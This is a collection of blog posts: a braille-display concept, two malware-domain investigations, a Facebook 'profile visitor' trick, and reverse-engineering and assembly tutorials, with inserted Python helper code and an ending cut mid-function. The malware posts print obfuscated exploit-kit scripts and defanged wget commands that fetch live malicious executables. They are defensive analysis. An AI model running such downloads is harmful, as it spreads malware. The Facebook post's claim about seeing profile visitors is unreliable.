Digital to braille..!!


The heading sounds exciting.
There is an MIT event happening next week (8th of July 2013). I was planning to participate, but unfortunately I was not able to get in, so I want everyone else to know what I have been thinking about for the last 2-3 weeks.
I am not much of an electronics guy and am trying to learn electronics, so please do tell me my mistakes so that I may improve it.

This is just a concept which I haven't demoed yet. I was planning to build a prototype at the event but was not selected, so I am telling everyone about it so that I may get inputs from them, and if someone likes it they may implement it.

Link to the event is here

I personally believe there are not many good devices on the market which give a realtime reading experience to visually challenged people.

So this concept is to convert every digital medium to braille.
The best part is that it is not just for English: it would be able to convert all symbols and languages to braille.
A person using the reader will have the experience of reading a real book, and not just books: we may convert webpages and other digital media to braille.

There are not many pictures available, but I will try to provide some within a few days, as I have no camera and no electronics which I could show.

Constraints for the present prototype:
I am converting all the data to one particular font for now, and I am keeping the size constant for every medium.

Screen used: something similar to a magnetic slate, which works on the principle of a magnetic field.
Link to Magnetic slate

I have no idea how to do this yet, so my next task is to make this screen work something like the screen of a Kindle reader,
and to increase the magnetic field by providing power (not sure; research in progress).
As my research says the E-ink technology works, we may develop something similar to the Kindle screen, which is an e-book reader.

Let's place this screen directly above a breadboard which has office pins in it.
Now, as the image is produced on the screen, it will produce a magnetic field which will pull the office pins towards it.
As we all know, magnetic force is vectorial in nature; for those who don't, read about it here: http://hyperphysics.phy-astr.gsu.edu/hbase/magnetic/magfor.html
Now the symbols will pull up the pins directly below them, while the pins which are not directly below will feel only a component of the force at some angle, so they won't be pulled up as much as the pins directly below the symbols (remember that the symbols are magnetic).
Now it is time to measure the distance by which the pins have risen.
This is all that I am sure about; after that I am not sure about things.

First

We may use the pins to trigger the circuit for the specific pattern and produce the content on an electronic braille screen or refreshable braille screen.

Second

We may trigger the circuit by measuring the movement from below the breadboard and then trigger the screen.

Advantages:
1) It is fast.
2) It will convert all the letters which are shown on the screen to braille.
3) It will have the real feel of reading a book or viewing a webpage in realtime.
For now the only constraints are the font and size, and I am not sure whether this really matters or not.

Different ideas which are kind of similar, and by which this idea is inspired:
1) A braille reader can read up to 200 words per minute
http://www.epokh.org/blog/?p=235
2) Zixel: A 2.5-D Graphical Tactile Display System
http://anirudh.me/2011/05/zixel-a-2-5-d-graphical-tactile-display-system/
3) World's 1st Braille Smartphone for Blind People
http://updateszone.com/worlds-1st-braille-smartphone-for-blind-people-coming-soon/

Comments and views required.
I would love it if someone feels like implementing this at their end, and I would love to extend this :)

My work for autistic people is on my other blog. This was my 1st blog post for visually challenged people; I will post more updates on this work very soon.
Link to my other blog
http://www.techautismandme.wordpress.com

Handling error 402: Payment Required with malicious domain #MMD


Link from where I started:

http://urlquery.net/report.php?id=1858750

And this link directed me to here:

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar

Error 402 and Payment Required.

Request URL:h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar
Request Method:GET
Status Code:402 Payment Required
Response Header
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Suspicious, isn't it?

So I proceeded by getting into the subdirectories of the server, and it resulted in the link

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL

which automatically led to a blank webpage.

Response for h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/pdfx.html

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:817
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:50 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Response for “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/zmiohek.html”

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1676
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:51 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

When I tried to analyse its source, I found a variable storing the web address.

<script>
var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";
</script>

Now use

wget --save-headers -d h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32

-d for debugging and --save-headers for saving the headers.

Or

simply paste this in your browser to download the exe ;)

Now this is the analysis report of this file from VirusTotal, and it says 8/45

https://www.virustotal.com/en/file/cb92c51ba26391eae67d85b968b61a71e33cea4a82894f10fa6777ae9938e7e8/analysis/

Anubis Report for this exe

http://anubis.iseclab.org/?action=result&task_id=1956ca7159064b544fd05dd3c6c72cd5e&format=pdf

Dig Report

dig XFECAJSMIPICHBEX.IN ANY
; <<>> DiG 9.8.3-P1 <<>> XFECAJSMIPICHBEX.IN ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5853
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;XFECAJSMIPICHBEX.IN. IN ANY
;; ANSWER SECTION:
XFECAJSMIPICHBEX.IN. 28800 IN A 192.210.150.43
XFECAJSMIPICHBEX.IN. 7200 IN SOA erdomain.mercury.orderbox-dns.com. founderapi.email.com. 2013040403 7200 7200 172800 38400
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mars.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.venus.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mercury.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.earth.orderbox-dns.com.
;; Query time: 401 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Tue Apr 9 11:42:38 2013
;; MSG SIZE rcvd: 239

whois xfecajsmipichbex.in
Domain ID:D7196301-AFIN
Domain Name:XFECAJSMIPICHBEX.IN
Created On:04-Apr-2013 21:46:01 UTC
Last Updated On:04-Apr-2013 21:46:03 UTC
Expiration Date:04-Apr-2014 21:46:01 UTC
Sponsoring Registrar:Webiq Domains Solutions Pvt. Ltd. (R131-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:WIQ_27213783
Registrant Name:founder api
Registrant Organization:N/A
Registrant Street1:foundap 4
Registrant City:new york
Registrant State/Province:New York
Registrant Postal Code:10006
Registrant Country:US
Registrant Phone:+1.5274563219
Registrant Email:founderapi@email.com

Domains hosted on the same IP, VirusTotal report:
https://www.virustotal.com/en/ip-address/192.210.150.43/information/

If you check the whois for every domain you will find the same credentials, like the phone number.

Screen shot for h00p://192.210.150.43/

Screen shot for the geographical address locator.

According to the code at http://wepawet.iseclab.org/view.php?hash=453609c244e3925ce0fe662a71eba0a8&t=1365501256&type=js there are 2 PDFs, but I was able to download just 1 of those 2.

PDF downloaded

TLfeaOwS.pdf

Header for page "h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/TLfeaOwS.pdf"

PDF data over browser:

%PDF-1.6 %<binary bytes> 18 0 obj <> endobj 6 0 obj <> endobj 22 0 obj <> endobj 8 0 obj <> stream 1.6511*pdf Piexnlaypa
endstream endobj 20 0 obj <> endobj 23 0 obj <> endobj 5 0 obj <> endobj 1 0 obj <> endobj 21 0 obj <> endobj 7 0 obj <> /XObject <<>>>> endobj 19 0 obj <> endobj xref 0 24 trailer <> startxref 802 %%EOF

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:5531
Content-Type:text/html;charset=utf-8
Date:Tue, 09 Apr 2013 13:17:17 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

VirusTotal report for the PDF file

https://www.virustotal.com/en/file/e0be674422a6579361b0724da99eee4c9b33e137239a7268c530f1afea0c1b3d/analysis/1366874391/

which confirms this as malicious.

Snapshot of all the files.

Every time you download the file it's going to give it some random name.

#MalwareMustDie

Malicious robaina91.com analysis #MMD


We got the information about the bad guy from this link (http://urlquery.net/report.php?id=1906732),

which finally leads us to this (h00p://www.robaina91[dot]com/es/robaina-album.html) website.

This looks like a normal one, but it is not (though Google Chrome already told me that the site is malicious).

Let's try to see the reply header:

Accept-Ranges:bytes
Connection:close
Content-Length:30270
Content-Type:text/html
Date:Wed, 10 Apr 2013 10:45:33 GMT
ETag:"5e18278-763e-51f1a980"
Last-Modified:Fri, 01 Feb 2013 20:09:26 GMT
Server:Apache/2.2.3 (CentOS)

It looks like a normal one, and indeed it is; let's dig a little more :)

On a little analysis of this code I found

<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;">

OK, let's analyse this link: h00p://allbestauto042[dot]ru/in.cgi?ftp

The header says:

Request URL:h00p://allbestauto042[dot]ru/in.cgi?ftp
Request Method:GET
Status Code:302 Found

Query String Parameters
ftp:

Response Headers
Connection:close
Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:08:31 GMT
Location:http://google.com
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;domain=allbestauto042.ru
Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;domain=allbestauto042.ru
Transfer-Encoding:chunked

Why 302, and why is it redirecting and yet not showing Google? I don't know; please do tell me, as I have no idea, but this looks suspicious.

After this it loads 10 PHP files:

h00p://newssearch006[dot]ru/flow01.php

ranging from flow01 to flow10.

Let's dig a little more.

Request URL:h00p://promoution115[dot]ru/tds/in.cgi?default
Request Method:GET
Status Code:302 Found

Response header
Connection:close
Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:14:46 GMT
Location:http://www.google.com
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxdefault=_10_0_20_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru
Set-Cookie:vbpnx2=_0_98_102_48_35_58_88_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru
Transfer-Encoding:chunked

Again redirecting.

After digging a little more I came across

"h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/pdfx.html"

and

"h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html"

This asked me to enable Java; as I don't know the website I never gave permission, but this means I am on track and close to my target.

So let's dig a little more.

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:735
Content-Type:text/html;charset=utf-8
Date:Thu, 11 Apr 2013 04:17:33 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Let's take a look at its code:

<script>
ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';
var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';
var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";
</script>

Isn't this suspicious?

h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

Let's see another file now; this one ends up with

Request URL:h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html
Request Method:GET
Status Code:200 OK
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1701
Content-Type:text/html;charset=utf-8
Date:Thu, 11 Apr 2013 12:04:24 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

<input type="text" id="bxpkr" value="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">

So a text field with some random text...

Nothing much. Let's get back and analyse that file which we got from the javascript :)

<script>
ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';
var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';
var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";
</script>

This is the new script, and there we got what we really wanted :)

"h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA"

The real malware, what we always wanted to have :)

wget --save-headers h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

Download this file and let's see its reports.

VirusTotal report

https://www.virustotal.com/en/file/09d4986243951c6eafd4b715dd6b01a3a08e56dc61528387a914115f304b5583/analysis/1365682386/

Anubis report

http://anubis.iseclab.org/?action=result&task_id=106d9fecea32c098409aa191b7f285fd4&format=pdf

So malware confirmed.

In the process of analysis I came across "h00p://golf2day[dot]com/wnqe.html", but I was not able to confirm why it is malicious, or why it is declared malicious by the browser, as it was asking for some ID and password and creating a secure connection.

Anyhow, let's see the domain and the whois of this domain.

whois 3d-game.com
  Domain Name: 3D-GAME.COM
  Registrar: DNC HOLDINGS, INC.
  Whois Server: whois.directnic.com
  Referral URL: http://www.directnic.com
  Name Server: NS1.DTDNS.COM
  Name Server: NS2.DTDNS.COM
  Name Server: NS3.DTDNS.COM
  Status: clientDeleteProhibited
  Status: clientTransferProhibited
  Status: clientUpdateProhibited
  Updated Date: 03-oct-2012
  Creation Date: 13-apr-2003
  Expiration Date: 13-apr-2014

Registrant: North Loop Networks
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501

Domain Name: 3D-GAME.COM

Administrative Contact:
Manager, Hostmaster hostmaster@northloopnetworks.com
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501

Technical Contact:
Manager, Hostmaster hostmaster@northloopnetworks.com
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501

Record last updated 03-02-2011 12:39:17 PM
Record expires on 04-13-2014
Record created on 04-13-2003

Domain servers in listed order:
NS1.DTDNS.COM 64.156.29.49
NS2.DTDNS.COM 67.228.106.194
NS3.DTDNS.COM 75.126.80.224
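As an added example (not code from either post), here are small Python helpers that parse the response-header dumps and the obfuscated script quoted in this post and in the 402 post above, and report the tells the posts call out: contradictory X-Powered-By banners, an Expires date decades before Date, an empty body behind a 402, a 302 to a benign site that still sets cookies, and executable URLs buried in script variables. The sample inputs are copied from the page and kept defanged (h00p, [dot]); the finding texts and the scheme list in URL_RE are my own.

```python
import re
from email.utils import parsedate_to_datetime

# Copied from the 402 response quoted in the first post (sample input for this example)
LANDING_402 = """Status Code:402 Payment Required
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP"""

# Copied from the in.cgi?ftp response quoted in the second post
TDS_302 = """Status Code:302 Found
Connection:close
Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:08:31 GMT
Location:http://google.com
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;domain=allbestauto042.ru
Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;domain=allbestauto042.ru
Transfer-Encoding:chunked"""

# Copied from the landing-page script quoted in the first post; the URL stays defanged
OBFUSCATED_SCRIPT = """var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";"""

# Matches real and defanged schemes (h00p/hxxp as used on the page) up to a quote or space
URL_RE = re.compile(r"""(?:h00p|hxxp|http)s?://[^\s"'<>]+""")


def parse_headers(dump):
    """Turn the 'Name:value' lines shown in the posts into (name, value) pairs, keeping repeats."""
    pairs = []
    for line in dump.splitlines():
        name, sep, value = line.partition(":")   # first colon only: Date values contain colons
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def values(pairs, name):
    return [v for n, v in pairs if n == name]


def header_findings(dump):
    """List the traits in one response that the posts flag as suspicious."""
    h = parse_headers(dump)
    findings = []
    status = (values(h, "status code") or [""])[0]
    powered = values(h, "x-powered-by")
    if len(set(powered)) > 1:      # ASP.NET and HipHop PHP claimed at once, on nginx no less
        findings.append("contradictory X-Powered-By banners: " + " / ".join(powered))
    dates = values(h, "date")
    for exp in values(h, "expires"):   # Expires decades before Date: never serve from cache
        if dates and parsedate_to_datetime(exp) < parsedate_to_datetime(dates[0]):
            findings.append("Expires predates Date (anti-caching)")
    if status.startswith("402") and values(h, "content-length") == ["0"]:
        findings.append("empty body behind an unusual 402 status")
    cookies = values(h, "set-cookie")
    if status.startswith("302") and cookies:   # bounce to a benign site while tagging the visitor
        loc = (values(h, "location") or ["?"])[0]
        findings.append("302 to %s with %d tracking cookie(s)" % (loc, len(cookies)))
    return findings


def extract_urls(text):
    """Every URL literal in a script or header dump, defanged ones included."""
    return URL_RE.findall(text)


def payload_urls(text):
    """Only the URLs whose path ends in a file type the posts saw being pushed."""
    return [u for u in extract_urls(text)
            if u.split("?", 1)[0].lower().endswith((".exe", ".jar", ".pdf"))]
```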


#MalwareMustDie

Facebook Hack, Who visited your profile.


It's a simple Facebook hack, nothing like some privacy leak or something, so I am not expecting any death threats because of this. If you are still interested in sending some of those, then send them to my personal ID, not my official one ;)

You don't have to give any permission or install anything; simply try this in your browser, and there is nothing like an information leak. It has just 5 very simple steps.
1) Log in to your Facebook: I hope this is something very simple and needs no explanation.

2) View source, or use this link "view-source:www.facebook.com": this is something very simple; if not, go to your Facebook, right click and view the source code.

3) Search for "InitialChatFriendsList": once in your source code, press (ctrl+f) and search for this string.
4) Right after this keyword you will see {"list":["1111111111","2222222222",...,"9999999999"]}: you are going to see a string like this just after what you searched for, and it will contain some random numbers.

5) Replace the X's with an ID to view the person's profile, www.facebook.com/XXXXXXXXXX, and see the person who visited your profile.

I hope this is pretty simple. Post your comments.

Regards

Unknown_had

What reverse engineering is? (Pure theory)


This post is for those who don't know what reverse engineering means.

I am not going to discuss anything technical, such as some disassembly tool or some debugger; I will just try to tell the young audience what reversing is.

Reverse engineering, as the name specifies, is something like starting from the very end and then finishing at the very start.

Does this sound kind of confusing?

Let me explain using a better example: it's the process of getting code from some binary.

As there are a lot of closed-source binaries available on the market, and some of them are malicious too, here we feel the need to reverse some particular binary.

Consider the example of some malware: we have no code for it, and we need to study how the malware works to know its internal features and what kind of things it's doing to my machine. In that case we have to cut the malware into 2 halves ;) (kidding).

We have to reverse that malware.

So mostly there are two kinds of ways by which we do this:

1) Dynamic analysis

2) Static analysis

Dynamic analysis is analysis of the sample using some debugger or some other tools while it's getting executed on the system. If we are not sure about the sample then it is better to use a VM for this, as that is going to keep you protected and not ruin the data on your machine.

Static analysis is about simply reversing the sample and then analysing the code.

Now here comes the assembly thing. As I have already taught the basics of assembly in my previous tutorial, this is going to be fun now, as this won't look like some MATRIX stuff :)

When you attach a running process to some debugger or some decompiler, it is not able to provide the native code (the original code in which the sample is written); it analyses it and dumps the assembly, and for that we should know assembly and other things.

In the next tutorials we are going to need the Olly debugger, as we will start with a simple, non-malicious crackme file and carry forward to the other things, and as things proceed I will try to train you from noob to PRO :)

Ask any question in the comments or mail me.

Do tell me if you find something which is wrong.

Thanks for reading.

Assembly Tutorial for Reverse engineering basics.


Introduction

I have learned assembly mostly from reading various tutorials online, reading books, and asking questions in newsgroups and on IRC.
This tutorial will focus on x86 assembly, which is going to help you further in the reverse engineering tutorials which I will be releasing after this.

Knowledge of higher level programming languages and basic knowledge of computer architecture is assumed.

Why assembly?

Because when we reverse any binary, the code which we get will be in assembly.

Who uses assembly?

I don't know. If you know then do share that with me, as according to me, now that you have higher level languages like C, C++ and a ton of other languages, why use assembly?

Though the assembly generation process is automated, there might be some places where we need handwritten assembly code.

Positives and negatives of assembly:

Positive: it is very fast, it's powerful and small.

Negatives: it is hardware dependent, not easy to debug, and consumes much more time than high level languages.

Assemblers

An assembler is used to convert assembly to machine language.
Often, it will come with a linker that links the assembled files and produces an
executable from them. Windows executables have the .exe extension. Here are some of the
popular ones:

1. MASM – This is the assembler this tutorial is geared towards, and you should
use this while going through this tutorial. Originally by Microsoft, it's now
included in the MASM32v8 package, which includes other tools as well. You
can get it from here.

2. TASM – Another popular assembler. Made by Borland, but it is still a
commercial product, so you can not get it for free.

3. NASM – A free, open source assembler, which is also available for other
platforms. It is available at link. Note that
NASM can't assemble most MASM programs and vice versa.

Basic Commands

There are some commands to learn (very basic, of course); this will help us to understand the reversed code easily and in an efficient
manner.

CPU registers

Registers are special memory locations on the CPU.
I am assuming the person is using a computer with an x86 or later processor.

There are 8 32-bit general purpose registers.

The first 4, eax, ebx, ecx, and edx, can also be accessed using 16 or 8-bit names.

ax gets the first 16 bits of eax, al gets the first 8 bits, and ah gets bits 9-16.
bx gets the first 16 bits of ebx.
The other registers can be accessed in a similar fashion.

We can use these registers for anything, although most have a special use:

Register  Name                        Description
EAX       Accumulator Register        calculations for operations and result data
EBX       Base Register               pointer to data in the DS segment
ECX       Count Register              counter for string and loop operations
EDX       Data Register               input/output pointer
ESI       Source Index                source pointer for string operations
EDI       Destination Index           destination pointer for string operations
ESP       Stack Pointer               stack pointer, should not be used
EBP       Base Pointer                pointer to data on the stack

NOTE: In Windows programming we may freely use only the EAX, ECX and EDX registers.

There are 6 16-bit segment registers. They define segments in memory:

Register        Name           Description
CS              Code Segment   where the instructions being executed are stored
DS, ES, FS, GS  Data Segment   data segments
SS              Stack Segment  stores the address of the stack for the current program

Two 32-bit registers that don't fit anywhere else:

Register  Name                 Description
EFLAGS    Flags Register       status, control, and system flags
EIP       Instruction Pointer  offset of the next instruction to be executed

Basic Instruction Set:

There are a lot of other instructions beyond these that I am going to tell you about here.
I will cover other instructions when we come across them.

ADD: reg/memory, reg/memory/constant Adds the two operands and stores the result into the first operand. If there is a result with carry, it will be set in CF.

SUB: reg/memory, reg/memory/constant Subtracts the second operand from the first and stores the result in the first operand.

AND: reg/memory, reg/memory/constant Performs the bitwise logical AND operation on the operands and stores the result in the first operand.

OR: reg/memory, reg/memory/constant Performs the bitwise logical OR operation on the operands and stores the result in the first operand.

XOR: reg/memory, reg/memory/constant Performs the bitwise logical XOR operation on the operands and stores the result in the first operand. Note that you can not XOR two memory operands.

MUL: reg/memory Multiplies the operand with the Accumulator Register and
stores the result in the Accumulator Register.

DIV: reg/memory Divides the Accumulator Register by the operand and stores
the result in the Accumulator Register.

INC: reg/memory Increases the value of the operand by 1 and stores the result in
the operand.

DEC: reg/memory Decreases the value of the operand by 1 and stores the result
in the operand.

NEG: reg/memory Negates the operand and stores the result in the operand.

NOT: reg/memory Performs the bitwise logical NOT operation on the operand and
stores the result in the operand.

PUSH: reg/memory/constant Pushes the value of the operand on to the top of the stack.

POP: reg/memory Pops the value of the top item of the stack in to the operand.

MOV: reg/memory, reg/memory/constant Stores the second operand’s value in the first operand.

CMP: reg/memory, reg/memory/constant Subtracts the second operand from the first operand and sets the respective flags. Usually used in conjunction with a JMP, REP, etc.

JMP: label Jumps to label.

LEA: reg, memory Takes the offset part of the address of the second operand and
stores the result in the first operand.

CALL: subroutine Calls another procedure and leaves control to it until it returns.

RET: Returns to the caller.

INT: constant Calls the interrupt specified by the operand.

You can grab latest complete instruction set reference at:
link

Push and Pop

Push and Pop are operations that manipulate the stack.
Push takes a value and adds it on top of the stack. Pop takes the value at the top of the stack, removes it, and stores it
in the operand. Thus, the stack works in Last In First Out (LIFO) order. Stacks are common data structures in computers.
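As an added example, not part of the tutorial, here is a small Python interpreter for the register and instruction subset described above: it models the 32/16/8-bit register aliasing (ax, al, ah inside eax), the LIFO stack behind PUSH and POP, and the ZF and CF flags set by ADD, SUB, CMP and friends. It accepts Intel syntax with register and immediate operands only (no memory operands) and adds jz/jnz, which the tutorial does not list, so that a CMP result can drive a loop; the sample program is constructed for this example.

```python
REG32 = ["eax", "ebx", "ecx", "edx", "esi", "edi", "esp", "ebp"]
# name -> (32-bit parent, bit offset, width): ax is the low 16 bits of eax, al the low 8, ah bits 9-16
ALIASES = {r: (r, 0, 32) for r in REG32}
for r in ("ax", "bx", "cx", "dx"):
    ALIASES[r], ALIASES[r[0] + "l"], ALIASES[r[0] + "h"] = ("e" + r, 0, 16), ("e" + r, 0, 8), ("e" + r, 8, 8)
for r in ("si", "di", "sp", "bp"):
    ALIASES[r] = ("e" + r, 0, 16)


class CPU:
    def __init__(self):
        self.regs = {r: 0 for r in REG32}
        self.stack = []                       # LIFO: the last element is the top of the stack
        self.flags = {"ZF": 0, "CF": 0}

    def get(self, operand):
        # Read a register of any width, or an immediate written in decimal or 0x hex
        if operand in ALIASES:
            parent, shift, width = ALIASES[operand]
            return (self.regs[parent] >> shift) & ((1 << width) - 1)
        return int(operand, 0) & 0xFFFFFFFF

    def set(self, reg, value):
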